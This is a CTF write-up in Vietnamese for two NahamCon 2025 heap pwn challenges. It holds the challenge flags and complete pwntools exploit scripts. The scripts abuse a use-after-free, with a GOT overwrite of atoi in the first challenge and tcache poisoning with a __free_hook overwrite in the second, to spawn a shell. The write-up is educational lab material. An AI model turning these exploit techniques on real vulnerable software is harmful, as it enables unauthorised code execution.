[WRITE UP] - NahamCon CTF 2025

index

Sau một thời gian dài tryhard heap thì đây là giải đầu tiên mình bắt đầu chơi CTF lại. Giải này có 2 bài heap khá hay và đây sẽ là write up cho 2 bài đó.

Lost Memory

Author

WittsEnd2

Category

pwn

Points

306

Solves

190

Description

I am trying to remember something, but I keep forgetting.

Flag

flag{2658c992bda627329ed2a8e6225623c6}

Mình sẽ tập trung phân tích những điểm chính trong binary này, đầu tiên là checksec:

1
$ checksec lost_memory
2
[*] '/mnt/e/sec/CTFs/2025/Nahamcon/Lost_Memory/lost_memory'
3
    Arch:       amd64-64-little
4
    RELRO:      Partial RELRO
5
    Stack:      No canary found
6
    NX:         NX enabled
7
    PIE:        No PIE (0x400000)
8
    SHSTK:      Enabled
9
    IBT:        Enabled
10
    Stripped:   No

Như ta có thể thấy, RELRO là Partial RELRO, và PIE tắt nên chúng ta có thể nghĩ đến ban đầu là việc overwrite GOT entry. Tiến sâu hơn vào phân tích binary:

1
int vuln()
2
{
3
  __int64 memIndex; // rbx
4
  _QWORD v2[3]; // [rsp+8h] [rbp-18h] BYREF
5

6
  v2[0] = 0xDEADBEEFDEADBEEFLL;
7
  setup_globals();
8
  while ( 1 )
9
  {
10
    while ( 1 )
11
    {
12
      while ( 1 )
13
      {
14
        while ( 1 )
15
        {
16
          while ( 1 )
17
          {
18
            choice = 0;
19
            menu();
20
            fflush(stdin);
21
            fgets(&input, 256, stdin);
22
            choice = atoi(&input);
23
            memset(&input, 0, 0x100uLL);
24
            size = 0LL;
25
            if ( choice != 1 )
26
              break;
27
            puts("What size would you like?");
28
            fgets(&input, 256, stdin);
29
            size = atol(&input);
30
            memset(&input, 0, 0x100uLL);
31
            if ( size > 0x100 )
32
              return puts("Size too large");
33
            memIndex = ::memIndex;
34
            *(&ptr + memIndex) = malloc(size);
35
            ptrSize[::memIndex] = size;
36
            puts("Allocated memory");
37
          }
38
          if ( choice != 2 )
39
            break;
40
          puts("What would you like to write?");
41
          fflush(stdin);
42
          fgets(&input, 256, stdin);
43
          if ( !input )
44
            return puts("No input provided");
45
          puts("Writing to memory...");
46
          memcpy(*(&ptr + ::memIndex), &input, ptrSize[::memIndex]);
47
          printf("ptr[memIndex] = %s\n", (const char *)*(&ptr + ::memIndex));
48
          printf("input = %s\n", &input);
49
          memset(&input, 0, 0x100uLL);
50
        }
51
        if ( choice != 3 )
52
          break;
53
        printf("Select an index to write to (0 - %d)\n ", 9);
54
        fgets(&input, 256, stdin);
55
        ::memIndex = atol(&input);
56
        memset(&input, 0, 0x100uLL);
57
        if ( (unsigned __int64)::memIndex > 9 )
58
          return puts("Invalid index");
59
      }
60
      if ( choice != 4 )
61
        break;
62
      if ( *(&ptr + ::memIndex) )
63
      {
64
        puts("Freeing memory...");
65
        free(*(&ptr + ::memIndex));
66
      }
67
      else
68
      {
69
        puts("No memory to free");
70
      }
71
    }
72
    if ( choice != 5 )
73
      break;
74
    puts("Storing flag return value");
75
    *(_QWORD *)*(&ptr + ::memIndex) = v2;
76
    printf("Stored return value: %p\n", *(const void **)*(&ptr + ::memIndex));
77
    printf("Stored return value: %p\n", v2);
78
  }
79
  if ( choice == 6 )
80
    return puts("Exiting...");
81
  else
82
    return puts("Invalid choice");
83
}

Tất cả mọi thứ đều gói gọn trong hàm vuln(), nhìn vào đó ta sẽ thấy có bug Use-After-Free ở option 4. Và để ý kĩ hơn ta sẽ thấy option 5 sẽ leak cho ta địa chỉ stack. Như vậy những gì chúng ta có là một cái địa chỉ stack, và bug UAF. Khi check các gadgets, mình thấy có các gadget khá hữu ích như sau:

1
0x401759: pop rbx ; pop rbp ; ret ;
2
0x40125c: add  [rbp-0x3D], ebx ; nop ; ret ;

Hai gadget này sẽ giúp ta cộng pointer của một địa chỉ bất kì, ở đây mình chọn địa chỉ GOT của atoi vì sau đó ta sẽ cho nó ret2main và nhập chuỗi /bin/sh vào là có được shell

1
#!/usr/bin/env python3
2
# -*- coding: utf-8 -*-
3
from pwnie import *
4
from subprocess import check_output
5
from time import sleep
6

7
context.log_level = 'debug'
8
context.terminal = ["wt.exe", "-w", "0", "split-pane", "--size", "0.65", "-d", ".", "wsl.exe", "-d", "Ubuntu-22.04", "--", "bash", "-c"]
9
exe = context.binary = ELF('./lost_memory_patched', checksec=False)
10
libc = exe.libc
11

12
gdbscript = '''
13
init-pwndbg
14
# init-gef-bata
15
b *0x4014E7
16
b *0x4016B0
17
b *0x4015A5
18
b *0x40175B
19
c
20
'''
21

22
def start(argv=[]):
23
    if args.GDB:
24
        p = process([exe.path] + argv, aslr=False)
25
        gdb.attach(p, gdbscript=gdbscript)
26
        pause()
27
        return p
28
    elif args.REMOTE:
29
        return remote(sys.argv[1], sys.argv[2])
30
    elif args.DOCKER:
31
        p = remote("localhost", 5000)
32
        sleep(0.5)
33
        pid = int(check_output(["pidof", "-s", "/app/run"]))
34
        gdb.attach(int(pid), gdbscript=gdbscript+f"\n set sysroot /proc/{pid}/root\nfile /proc/{pid}/exe", exe=exe.path)
35
        pause()
36
        return p
37
    else:
38
        return process([exe.path] + argv)
39

40
def choice(option: int):
41
    slna(b'choice:\n', option)
42

43
def alloc(size):
44
    choice(1)
45
    slna(b'like?\n', size)
46

47
def write(data):
48
    choice(2)
49
    sla(b'write?\n', data)
50

51
def free():
52
    choice(4)
53

54
def show():
55
    choice(5)
56
    ru(b'return value: ')
57
    return rl()[:-1]
58

59
# ==================== EXPLOIT ====================
60
p = start()
61

62
alloc(0x100) # 0
63
stack_leak = int(show(), 16)
64
success('stack leak @ %#x', stack_leak)
65

66
free()
67
write(b'0'*8)
68
free()
69

70
write(p64(stack_leak + 0x18)) # saved rbp
71
alloc(0x100)
72
alloc(0x100)
73

74
pop_rbx_rbp = 0x401759
75
add_ptr     = 0x40125c
76
ret         = 0x40101a
77

78
write(flat(
79
    0xdeadbeef,
80
    pop_rbx_rbp,
81
    0xdce0, exe.got.atoi + 0x3d,
82
    add_ptr,
83
    ret,
84
    exe.sym.main
85
))
86

87
choice(6)
88
sl(b'/bin/sh\0')
89

90
interactive()

Found memory

Authors

WittsEnd2, z3phyr

Category

pwn

Points

306

Solves

190

Description

I have found something! But not getting anywhere.

Flag

flag{04b12c28513188fbf6513f8d080b9ee1}

Bài này thì khó hơn một chút, do ta chỉ được tạo mỗi lần một chunk 0x30 thôi, nhưng nó vẫn tồn tại lỗi UAF, mình có thể tận dụng nó, và control fd của free chunk trong tcache. Mình sẽ muốn leak được địa chỉ của libc nên việc đầu tiên của mình sẽ phải là làm ra một chunk 0x420. Sau đó là overwrite __free_hook. Cách của mình cần brute vì nó không có leak heap, nhưng chúng ta có thể leak được heap vì bài này cho chúng ta alloc tận 100 lần nên điều đó thoải mái

1
#!/usr/bin/env python3
2
# -*- coding: utf-8 -*-
3
from pwnie import *
4
from subprocess import check_output
5
from time import sleep
6

7
# context.log_level = 'debug'
8
context.terminal = ["wt.exe", "-w", "0", "split-pane", "--size", "0.65", "-d", ".", "wsl.exe", "-d", "Ubuntu-22.04", "--", "bash", "-c"]
9
exe = context.binary = ELF('./found_memory_patched', checksec=False)
10
libc = exe.libc
11

12
gdbscript = '''
13
init-pwndbg
14
# init-gef-bata
15
brva 0x16EB
16
brva 0x15BC
17
brva 0x1495
18
brva 0x1647
19
c
20
'''
21

22
def start(argv=[]):
23
    if args.REMOTE:
24
        return remote(sys.argv[1], sys.argv[2])
25
    elif args.DOCKER:
26
        p = remote("localhost", 5000)
27
        sleep(0.5)
28
        pid = int(check_output(["pidof", "-s", "/app/run"]))
29
        gdb.attach(int(pid), gdbscript=gdbscript+f"\n set sysroot /proc/{pid}/root\nfile /proc/{pid}/exe", exe=exe.path)
30
        pause()
31
        return p
32
    else:
33
        return process([exe.path] + argv)
34

35
def choice(option: int):
36
    slna(b'> ', option)
37

38
def alloc():
39
    choice(1)
40
    ru(b'Allocated slot ')
41
    info(f'Allocated slot @ {rl()[:-1]}')
42

43
def free(idx):
44
    choice(2)
45
    slna(b': ', idx)
46

47
def view(idx):
48
    choice(3)
49
    slna(b': ', idx)
50

51
def edit(idx, data):
52
    choice(4)
53
    slna(b': ', idx)
54
    sa(b'Enter data: ', data)
55

56
# ==================== EXPLOIT ====================
57

58
while True:
59
    p = start()
60
    try:
61
        # Leak libc address
62
        alloc() # 0
63
        alloc() # 1
64
        alloc() # 2
65

66
        free(1)
67
        free(2)
68

69
        edit(2, p8(0x90))   # Overwrite chunk at index 2 point to metadata of chunk 0
70
        alloc()
71
        alloc() # 2
72

73
        edit(2, p64(0) + p64(0x421)) # Overwrite chunk 0 metadata to make it 0x420 bytes
74
        alloc() # 3
75

76
        free(1)
77
        free(3)
78

79
        edit(3, p16(0xa6b0))
80

81
        alloc() # 1
82
        alloc() # 3
83

84
        fake_chunk = flat(
85
            0, 0x21,
86
            0, 0,
87
            0, 0x21
88
        )
89

90
        edit(3, fake_chunk) # Bypass unsortedbin mitigation
91
        free(0) # [Need to brute] Free it and this chunk goes to unsortedbin
92

93
        view(0)
94
        libc.address = u64(rb(6).ljust(0x8, b'\0')) - 0x1ecbe0
95
        success('libc base @ %#x', libc.address)
96

97
        if args.GDB:
98
            gdb.attach(p, gdbscript=gdbscript)
99
            pause()
100

101
        # Overwrite __free_hook with system
102
        alloc() # 0
103
        alloc() # 4
104

105
        free(0)
106
        free(4)
107

108
        edit(4, p64(libc.sym.__free_hook))
109

110
        alloc() # 0
111
        alloc() # 4
112

113
        edit(4, p64(libc.sym.system))
114
        edit(0, b'/bin/sh\0')
115
        free(0)
116

117
        sl(b'echo WIN')
118
        if b'WIN' in rl():
119
            success('Got shell!')
120
            interactive()
121
            break
122
    except:
123
        close()